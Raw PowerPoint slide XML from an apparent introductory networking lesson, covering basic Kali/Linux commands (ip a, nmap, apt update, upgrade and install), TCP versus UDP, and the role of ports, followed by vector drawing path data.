            <a:ext cx="2515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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a       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8A47AD-FC72-8296-6204-4B9E00A4784E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2190750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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7309328C-11BB-E509-1FA1-E5148AECEC5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1951990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 network  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8F10D909-56B2-9836-5DAA-6140EBA493D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609599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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address     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2555E8-5415-FCDC-3EDE-0BE92AF74A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745736" y="2608915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52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDE2E797-418A-EC50-8DCB-CE962AF467A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052249" y="2387599"/>
            <a:ext cx="3067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scan networks   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D275AA4C-BF03-A858-C36E-8CC945E45A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2724150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 err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> apt update  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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4E2288-FD8A-7D9C-65B9-E05C3A3D88D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2729230" y="2945001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 Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{674D2611-4C54-205F-B926-6C70ABEFFB0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439285" y="2787650"/>
            <a:ext cx="3113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packet kali </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718649B5-7DBF-ACE1-83F8-059FC8512EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3184323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 err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> apt upgrade    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r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BD965270-F4F3-8ACC-304C-99D50FEAFD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379302" y="3208067"/>
            <a:ext cx="270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Upgrade packet installed   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995C66-32B4-143A-3460-F0487F96D916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022920" y="3365336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FE717F-7691-F22E-04A6-E5C87CC4997B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775899" y="3737457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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9685559B-1F0D-7303-E23F-C52C963D27E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3603453"/>
            <a:ext cx="30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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> apt install tool name    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64DF0D59-6F9F-D9E5-2BAE-565949141E91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5455157" y="3528853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Install tools    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787146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C28559B-8C61-AF8B-3D08-83DEF24A9E93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7931956-E7D0-1D0C-3C0D-62E4C7A8C747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7  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP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UDP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9C7787C-35E6-00B0-3478-1665EE4687EB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5B8D50C-A693-DAD5-F4C0-CA2A08E50B3F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70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4FF681A-AA3B-E3DA-84D5-40892CDD4CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="2106026"/>
            <a:ext cx="7481570" cy="134239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other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hand,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UDP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much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more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simple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than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TCP:</a:t>
            </a:r>
            <a:endParaRPr sz="240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does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400" b="1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guarantee</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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delivery.</a:t>
            </a:r>
            <a:endParaRPr sz="240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connectionless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413305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4257AB1-9370-EF52-ECA9-ECEB6CC591AE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E87D3E5-F8A1-7F0B-B664-870DAADA5BDC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7 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TCP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UDP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0CB6ED7-18AD-96F6-91AF-BB87D0D3BC2D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A06659E-00F3-BDCE-BBD4-5A5A7DC39447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71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334E050-598D-D35C-C1ED-F4E1C466B8A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1264019"/>
            <a:ext cx="779970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UDP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faster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than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TCP,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provides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better</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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throughput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(number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packets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per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second);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fact,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by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multimedia</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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applications</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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tolerate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loss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but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throughput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intensive.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>
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="252729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example,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UDP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VoIP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video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streaming: applications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where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tolerate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little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glitch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audio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video.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092154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A852CB9-48EB-8180-6916-96961F3E9918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407848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6027BC9-31CC-DC94-A7AD-51D7B4262ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495274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7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TCP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UDP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BA9A022-AAD6-0168-8834-6D41C3C1FC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5194351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9F8CF67-F9BF-1A50-5752-E6C858835974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5194351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72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06952CD-F8C5-3B18-41EF-5B596600A1CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494665" y="1350380"/>
            <a:ext cx="8154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Here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see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comparison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table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between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TCP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UDP.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="table">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897BB29E-9FCA-9C61-E94D-4D1F2FB8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94" y="1956678"/>
            <a:ext cx="6616700" cy="26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905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24BCD70-8163-696D-C3AE-2D1A6C25237E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8A4693D-EACD-B527-DBFB-A847FE769C48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Ports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4D7866BA-6CC7-519D-37BD-99F0F2E38AD2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3248EFD-A966-A855-32A1-5A7C29F98C26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73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CB88FC9-CA23-6136-879A-FCA847DBAA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1629475"/>
            <a:ext cx="8005445" cy="236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Applications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their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processes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TCP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UDP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send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receive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data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over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network.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When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IP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datagram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reaches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host,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transport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layer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know</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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what</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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destination</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="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process </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-25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?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We’ll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now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introduce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ports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234983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FBD0109-FD64-0E81-0CE5-3FA06A61E1E9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074C858-5377-6DC6-6F2B-3BBC177780FF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Ports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49E036E0-D599-DCB5-BF61-CA780D4370D3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7F3DB3F-C6CC-5525-78F8-57305C414650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74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5EBA315-C525-2AFD-E7E1-40A10DCAA9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1264019"/>
            <a:ext cx="8051165" cy="30988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kern="0"/>
            </a:defPPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700" marR="34290">
              <a:lnSpc>
                <a:spcPct val="98000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="155"/>
              </a:spcBef>
            </a:pP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Ports</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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identify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single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process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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a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machine.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If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want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unequivocally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identify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process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on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1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network,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need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know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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>IP&gt;:&lt;Port&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-86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pair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4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example,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compare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recipient's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name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letter;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street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address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(IP)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identifies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building,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while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person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name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identifies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final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recipient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letter.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411774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9B6DC25-7AEE-7226-52F0-9E93DE79C73A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Ports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Examples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04429FC-AC6F-6827-4ED2-1ECB5CF6D074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1117716"/>
            <a:ext cx="77685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this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image,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every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client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application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endParaRPr sz="2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400" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1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different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port.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DD09C00-FF67-CF36-5D55-AD97ADB93E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497391" y="4678558"/>
            <a:ext cx="556260" cy="105410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="33290" y="2294"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33922" y="65280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39862" y="64416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49325" y="60954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53413" y="58357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57876" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13370" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57523" y="11127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50454" y="6408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46750" y="4823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38394" y="2800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33290" y="2294"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="59961" y="13758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30805" y="13758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34306" y="14061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39839" y="15275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51809" y="35946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51380" y="38619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30015" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57876" y="53884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59646" y="52109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61837" y="48815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64931" y="41216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65699" y="37091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65636" y="26503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64660" y="21964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60482" y="14320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59961" y="13758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="110824" y="25290"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78375" y="48598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76021" y="65079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76609" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103243" y="104135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="104801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="104135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="102137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="98807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="94145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104003" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98723" y="91458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89120" y="55322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91017" y="48074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98606" y="38585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103958" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136286" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136119" y="35980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130995" y="31303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125072" y="27962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="25958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110824" y="25290"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="136286" y="36215"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="117622" y="36215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122930" y="38585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="48074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="55322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132483" y="74611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130628" y="81551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130563" y="81792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122862" y="91458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117577" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136312" y="93874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="88333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143098" y="81792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="81551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="73800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145560" y="65079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144971" y="56356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143202" y="48598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140253" y="41806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136286" y="36215"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="180363" y="27661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167693" y="27661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167693" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="49230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183751" y="46489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187252" y="44251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194547" y="40789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197875" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="27661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="214715" y="40026"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="206765" y="40026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210311" y="40430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212283" y="40789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214038" y="41205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="41205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="40026"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="211237" y="27661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200151" y="27661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197528" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189849" y="31594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185400" y="34462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180363" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="38509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214715" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214938" y="28223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211237" y="27661"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="241343" y="38035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="87222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230660" y="93852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238678" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244527" y="104194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254419" y="104194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256926" y="103991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262550" y="103182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265147" y="102665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267179" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="102125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251958" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250033" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249550" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245977" y="91043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241433" y="79409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="38035"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="267519" y="90639"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="266841" y="90639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265847" y="91043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264244" y="91549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259750" y="92763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257581" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="93066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="90639"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="267519" y="27381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="220090" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220090" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="38035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267519" y="27381"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="241343" y="5733"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228673" y="5733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228673" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241343" y="5733"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="311424" y="27381"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="27381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="46599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="46599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="27381"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="311424" y="83490"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="295321" y="83490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295321" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="102710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311424" y="83490"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="556259" h="105410">
                <a:moveTo>
                  <a:pt x="440588" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="420984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413079" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400680" y="12588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397563" y="18884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397563" y="31561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413418" y="48690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413418" y="49097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394876" y="83761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398105" y="90953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430560" y="105002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437747" y="104476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444414" y="102895"/>
                </a:lnTo>
